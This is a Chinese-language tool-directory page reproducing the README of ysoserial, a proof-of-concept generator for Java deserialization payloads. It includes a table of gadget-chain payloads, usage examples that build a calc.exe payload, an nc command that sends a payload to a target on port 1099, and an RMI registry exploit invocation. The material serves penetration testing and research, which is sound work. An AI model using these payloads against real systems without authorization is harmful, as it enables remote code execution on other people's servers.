Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ysoserial — 一个概念验证工具,用于生成利用不安全的 Java 对象反序列化的攻击载荷。 | Kitploit
工具/GitHubGitHub/al1ex/ysoserial
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubal1ex/ysoserial

ysoserial

一个概念验证工具,用于生成利用不安全的 Java 对象反序列化的攻击载荷。

查看仓库
281年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ysoserial

GitHub release Travis Build Status Appveyor Build status JitPack

一个用于生成利用不安全的 Java 对象反序列化漏洞的 payload 的概念验证工具。

logo

描述

最初作为 AppSecCali 2015 演讲 "Marshalling Pickles:对象反序列化将如何毁掉你的一天" 的一部分发布,包含 Apache Commons Collections(3.x 和 4.x)、Spring Beans/Core(4.x)和 Groovy(2.3.x)的 gadget chain。 后来更新,增加了针对 JRE <= 1.7u21 及其他几个库的额外 gadget chain。

ysoserial 是一个工具集合,其中包含在常见 Java 库中发现的面向属性编程(property-oriented programming)“gadget chain”。 在适当的条件下,这些链可以利用执行对象 不安全反序列化 的 Java 应用程序。主驱动程序接收用户指定的命令, 将其包装到用户指定的 gadget chain 中,然后将这些对象序列化到 stdout。当 classpath 中包含所需 gadget 的应用程序 不安全地反序列化此数据时,该链将被自动触发,并在应用程序主机上执行该命令。

需要说明的是,漏洞在于应用程序执行了不安全的反序列化,而非 classpath 中存在 gadget。

免责声明

本软件纯粹出于学术研究和开发有效防御技术的目的而创建, 不应用于攻击系统,除非获得明确授权。项目维护者不对软件的滥用负责或承担任何责任。请负责任地使用。

用法

$  java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
  Available payload types:
       Payload             Authors                                Dependencies
     -------             -------                                ------------
     AspectJWeaver       @Jang                                  aspectjweaver:1.9.2, commons-collections:3.2.2
     BeanShell1          @pwntester, @cschneider4711            bsh:2.0b5
     C3P0                @mbechler                              c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Click1              @artsploit                             click-nodeps:2.3.0, javax.servlet-api:3.1.0
     Clojure             @JackOfMostTrades                      clojure:1.8.0
     CommonsBeanutils1   @frohoff                               commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsCollections1 @frohoff                               commons-collections:3.1
     CommonsCollections2 @frohoff                               commons-collections4:4.0
     CommonsCollections3 @frohoff                               commons-collections:3.1
     CommonsCollections4 @frohoff                               commons-collections4:4.0
     CommonsCollections5 @matthias_kaiser, @jasinner            commons-collections:3.1
     CommonsCollections6 @matthias_kaiser                       commons-collections:3.1
     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
     FileUpload1         @mbechler                              commons-fileupload:1.3.1, commons-io:2.4
     Groovy1             @frohoff                               groovy:2.3.9
     Hibernate1          @mbechler
     Hibernate2          @mbechler
     JBossInterceptors1  @matthias_kaiser                       javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     JRMPClient          @mbechler
     JRMPClient1         @mbechler
     JRMPClient2         @mbechler
     JRMPListener        @mbechler
     JSON1               @mbechler                              json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser                       javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21             @frohoff
     Jython1             @pwntester, @cschneider4711            jython-standalone:2.5.2
     MozillaRhino1       @matthias_kaiser                       js:1.7R2
     MozillaRhino2       @_tint0                                js:1.7R2
     Myfaces1            @mbechler
     Myfaces2            @mbechler
     ROME                @mbechler                              rome:1.0
     Spring1             @frohoff                               spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2             @mbechler                              spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS              @gebl
     Vaadin1             @kai_ullrich                           vaadin-server:7.7.14, vaadin-shared:7.7.14
     Wicket1             @jacob-baines                          wicket-util:6.23.0, slf4j-api:1.6.4

示例

$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

安装

GitHub release

从 GitHub releases 下载最新 release jar。

构建

需要 Java 1.7+ 和 Maven 3.x+

mvn clean package -DskipTests

代码状态

Build Status Build status

贡献

  1. Fork 此仓库
  2. 创建你的特性分支(git checkout -b my-new-feature)
  3. 提交你的更改(git commit -am 'Add some feature')
  4. 推送到分支(git push origin my-new-feature)
  5. 创建新的 Pull Request

另请参阅

  • Java-Deserialization-Cheat-Sheet:有关漏洞、工具、博客/文章等信息
  • marshalsec:针对各种 Java 反序列化格式/库的类似项目
  • ysoserial.net:针对 .NET 反序列化的类似项目
下载工具